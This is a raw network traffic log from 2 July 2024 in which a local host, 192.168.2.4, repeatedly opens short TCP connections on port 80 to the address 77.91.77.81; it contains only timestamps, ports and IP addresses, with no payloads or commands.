Jul 2, 2024 00:27:22.204583883 CEST	49883	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.204814911 CEST	80	49884	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:22.204885006 CEST	49884	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.205101967 CEST	49884	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.211535931 CEST	80	49884	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:22.893599987 CEST	80	49884	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:22.898881912 CEST	49884	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.901752949 CEST	49884	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.901756048 CEST	49885	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.908586979 CEST	80	49885	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:22.909044981 CEST	80	49884	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:22.909157038 CEST	49884	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.909161091 CEST	49885	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.909430027 CEST	49885	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:22.916152000 CEST	80	49885	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:23.636791945 CEST	80	49885	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:23.636861086 CEST	49885	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:23.744281054 CEST	49885	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:23.744663000 CEST	49886	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:23.749330044 CEST	80	49885	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:23.749387980 CEST	49885	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:23.749418974 CEST	80	49886	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:23.749479055 CEST	49886	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:23.749670029 CEST	49886	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:23.754443884 CEST	80	49886	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:24.446239948 CEST	80	49886	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:24.446336031 CEST	49886	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:24.483026028 CEST	49886	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:24.483448982 CEST	49887	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:24.494229078 CEST	80	49887	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:24.494352102 CEST	49887	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:24.494486094 CEST	80	49886	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:24.494548082 CEST	49886	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:24.501204967 CEST	49887	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:24.510776997 CEST	80	49887	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:25.235282898 CEST	80	49887	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:25.238909006 CEST	49887	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:25.421534061 CEST	49887	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:25.421952963 CEST	49888	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:25.430753946 CEST	80	49887	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:25.430890083 CEST	80	49888	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:25.430922985 CEST	49887	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:25.431015015 CEST	49888	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:25.443507910 CEST	49888	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:25.452390909 CEST	80	49888	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.115308046 CEST	80	49888	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.115359068 CEST	49888	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.118840933 CEST	49888	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.119138002 CEST	49889	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.125370026 CEST	80	49889	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.125435114 CEST	49889	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.125592947 CEST	49889	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.125627041 CEST	80	49888	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.125711918 CEST	49888	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.132314920 CEST	80	49889	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.818293095 CEST	80	49889	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.818481922 CEST	49889	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.931133032 CEST	49889	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.931133032 CEST	49890	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.937630892 CEST	80	49890	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.937917948 CEST	49890	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.937974930 CEST	80	49889	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:26.938127995 CEST	49889	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.938330889 CEST	49890	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:26.944998026 CEST	80	49890	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:27.634061098 CEST	80	49890	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:27.634144068 CEST	49890	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:27.637857914 CEST	49890	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:27.638243914 CEST	49891	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:27.643131018 CEST	80	49890	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:27.643152952 CEST	80	49891	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:27.643186092 CEST	49890	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:27.643229008 CEST	49891	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:27.646941900 CEST	49891	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:27.652004957 CEST	80	49891	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:28.373368979 CEST	80	49891	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:28.374826908 CEST	49891	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:28.752139091 CEST	49891	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:28.752440929 CEST	49892	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:28.759433985 CEST	80	49891	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:28.759757042 CEST	80	49892	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:28.759825945 CEST	49891	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:28.759856939 CEST	49892	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:28.764076948 CEST	49892	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:28.771548033 CEST	80	49892	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:29.472655058 CEST	80	49892	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:29.472707987 CEST	49892	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:29.475826979 CEST	49892	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:29.476273060 CEST	49893	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:29.480834007 CEST	80	49892	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:29.480880976 CEST	49892	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:29.482585907 CEST	80	49893	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:29.482687950 CEST	49893	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:29.482877016 CEST	49893	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:29.487942934 CEST	80	49893	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:30.198796988 CEST	80	49893	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:30.200997114 CEST	49893	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:30.305473089 CEST	49893	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:30.305834055 CEST	49894	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:30.311196089 CEST	80	49894	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:30.311321020 CEST	49894	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:30.311423063 CEST	80	49893	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:30.311482906 CEST	49893	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:30.311558962 CEST	49894	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:30.316509962 CEST	80	49894	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:30.997868061 CEST	80	49894	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:30.997951984 CEST	49894	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:31.001688957 CEST	49894	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:31.002126932 CEST	49895	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:31.006720066 CEST	80	49894	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:31.006771088 CEST	49894	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:31.007368088 CEST	80	49895	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:31.007426023 CEST	49895	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:31.007890940 CEST	49895	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:31.012628078 CEST	80	49895	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:31.714417934 CEST	80	49895	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:31.714996099 CEST	49895	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.005290985 CEST	49895	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.005676031 CEST	49896	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.010464907 CEST	80	49895	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:32.010492086 CEST	80	49896	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:32.010596037 CEST	49896	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.010596037 CEST	49895	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.024245024 CEST	49896	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.029031992 CEST	80	49896	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:32.722124100 CEST	80	49896	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:32.722184896 CEST	49896	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.726485014 CEST	49896	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.726878881 CEST	49897	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.731714010 CEST	80	49897	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:32.731796980 CEST	49897	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.731887102 CEST	80	49896	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:32.731933117 CEST	49896	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.732110023 CEST	49897	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:32.739100933 CEST	80	49897	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:33.434792042 CEST	80	49897	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:33.434890032 CEST	49897	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:33.540714979 CEST	49897	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:33.541116953 CEST	49898	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:33.548219919 CEST	80	49898	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:33.548301935 CEST	49898	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:33.548429966 CEST	49898	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:33.548711061 CEST	80	49897	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:33.548819065 CEST	49897	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:33.555748940 CEST	80	49898	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:34.239109993 CEST	80	49898	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:34.239310980 CEST	49898	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:34.242280960 CEST	49898	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:34.242731094 CEST	49899	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:34.247409105 CEST	80	49898	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:34.247500896 CEST	80	49899	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:34.247524977 CEST	49898	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:34.247658968 CEST	49899	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:34.247900009 CEST	49899	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:34.252655029 CEST	80	49899	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:34.948859930 CEST	80	49899	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:34.948916912 CEST	49899	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.056126118 CEST	49899	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.056572914 CEST	49900	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.061357975 CEST	80	49900	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:35.061434984 CEST	49900	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.061434984 CEST	80	49899	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:35.061484098 CEST	49899	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.061634064 CEST	49900	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.066734076 CEST	80	49900	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:35.882183075 CEST	80	49900	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:35.882317066 CEST	49900	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.885777950 CEST	49900	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.886085033 CEST	49901	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.890870094 CEST	80	49901	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:35.890919924 CEST	80	49900	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:35.894860029 CEST	49901	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.894860983 CEST	49900	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.895025969 CEST	49901	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:35.899769068 CEST	80	49901	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:36.595822096 CEST	80	49901	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:36.597163916 CEST	49901	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:36.713185072 CEST	49901	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:36.713483095 CEST	49902	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:36.718250036 CEST	80	49902	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:36.718319893 CEST	49902	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:36.718344927 CEST	80	49901	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:36.718444109 CEST	49901	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:36.718775988 CEST	49902	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:36.723532915 CEST	80	49902	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:37.422610998 CEST	80	49902	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:37.425004959 CEST	49902	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:37.678636074 CEST	49902	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:37.684741974 CEST	80	49902	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:37.685179949 CEST	49902	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:37.687468052 CEST	49903	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:37.692487001 CEST	80	49903	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:37.692895889 CEST	49903	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:37.697964907 CEST	49903	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:37.702855110 CEST	80	49903	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:38.388003111 CEST	80	49903	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:38.388098955 CEST	49903	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:38.493858099 CEST	49903	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:38.494189024 CEST	49904	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:38.498980999 CEST	80	49904	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:38.499008894 CEST	80	49903	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:38.499097109 CEST	49903	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:38.499119997 CEST	49904	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:38.499298096 CEST	49904	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:38.504158974 CEST	80	49904	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:39.208529949 CEST	80	49904	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:39.209142923 CEST	49904	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:39.211816072 CEST	49905	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:39.211822987 CEST	49904	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:39.216603994 CEST	80	49905	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:39.216721058 CEST	49905	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:39.216837883 CEST	80	49904	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:39.216943979 CEST	49905	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:39.217077971 CEST	49904	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:39.221656084 CEST	80	49905	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:39.938034058 CEST	80	49905	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:39.938097954 CEST	49905	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:40.057894945 CEST	49905	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:40.058218002 CEST	49906	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:40.064548016 CEST	80	49906	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:40.064615011 CEST	49906	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:40.064775944 CEST	49906	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:40.064881086 CEST	80	49905	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:40.064934015 CEST	49905	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:40.071192980 CEST	80	49906	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:40.781914949 CEST	80	49906	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:40.788928032 CEST	49906	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.098797083 CEST	49906	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.099411964 CEST	49907	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.103925943 CEST	80	49906	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:41.104218960 CEST	80	49907	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:41.104253054 CEST	49906	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.106726885 CEST	49907	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.112859964 CEST	49907	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.117645979 CEST	80	49907	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:41.808721066 CEST	80	49907	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:41.808789968 CEST	49907	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.915884018 CEST	49907	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.916285992 CEST	49908	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.921127081 CEST	80	49907	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:41.921139956 CEST	80	49908	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:41.921180964 CEST	49907	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.921226978 CEST	49908	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.921627045 CEST	49908	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:41.926348925 CEST	80	49908	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:42.627805948 CEST	80	49908	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:42.627857924 CEST	49908	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:42.631243944 CEST	49908	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:42.631668091 CEST	49909	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:42.636678934 CEST	80	49909	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:42.636749029 CEST	49909	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:42.637049913 CEST	49909	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:42.637052059 CEST	80	49908	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:42.637099028 CEST	49908	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:42.641992092 CEST	80	49909	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:43.334249020 CEST	80	49909	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:43.334391117 CEST	49909	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:43.446554899 CEST	49909	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:43.446554899 CEST	49910	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:43.453229904 CEST	80	49910	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:43.453428030 CEST	49910	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:43.453561068 CEST	80	49909	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:43.453609943 CEST	49910	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:43.453671932 CEST	49909	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:43.460222006 CEST	80	49910	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:44.274358034 CEST	80	49910	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:44.274415970 CEST	49910	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:44.278004885 CEST	49910	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:44.278326988 CEST	49911	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:44.284567118 CEST	80	49910	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:44.284625053 CEST	49910	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:44.285128117 CEST	80	49911	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:44.285195112 CEST	49911	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:44.285496950 CEST	49911	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:44.292298079 CEST	80	49911	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.024765968 CEST	80	49911	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.024925947 CEST	49911	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.134459972 CEST	49911	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.134459972 CEST	49912	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.141697884 CEST	80	49912	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.141781092 CEST	49912	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.141993046 CEST	80	49911	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.144892931 CEST	49912	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.144927025 CEST	49911	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.151408911 CEST	80	49912	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.874988079 CEST	80	49912	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.875055075 CEST	49912	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.879528046 CEST	49912	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.879925013 CEST	49913	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.884666920 CEST	80	49912	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.884720087 CEST	49912	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.885220051 CEST	80	49913	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:45.885293007 CEST	49913	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.885494947 CEST	49913	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:45.890791893 CEST	80	49913	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:46.583563089 CEST	80	49913	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:46.583626032 CEST	49913	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:46.696599960 CEST	49913	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:46.696599960 CEST	49914	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:46.703885078 CEST	80	49914	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:46.704135895 CEST	80	49913	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:46.706913948 CEST	49913	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:46.706913948 CEST	49914	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:46.707103014 CEST	49914	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:46.714409113 CEST	80	49914	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:47.423033953 CEST	80	49914	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:47.423157930 CEST	49914	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:47.426286936 CEST	49914	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:47.426291943 CEST	49915	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:47.431071997 CEST	80	49915	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:47.431159019 CEST	49915	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:47.431543112 CEST	49915	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:47.431560040 CEST	80	49914	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:47.431653976 CEST	49914	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:47.436250925 CEST	80	49915	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:48.867541075 CEST	80	49915	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:48.867805958 CEST	80	49915	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:48.868057966 CEST	80	49915	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:48.868158102 CEST	49915	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:48.868158102 CEST	49915	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:48.977860928 CEST	49915	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:48.977864981 CEST	49916	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:48.985449076 CEST	80	49916	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:48.986953974 CEST	49916	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:48.987001896 CEST	80	49915	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:48.990848064 CEST	49916	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:48.990991116 CEST	49915	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:48.998172998 CEST	80	49916	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:49.715853930 CEST	80	49916	77.91.77.81	192.168.2.4
Jul 2, 2024 00:27:49.715955973 CEST	49916	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:49.732486010 CEST	49916	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:49.732884884 CEST	49917	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:27:49.737925053 CEST	80	49917	77.91.77.81	192.168.2.4
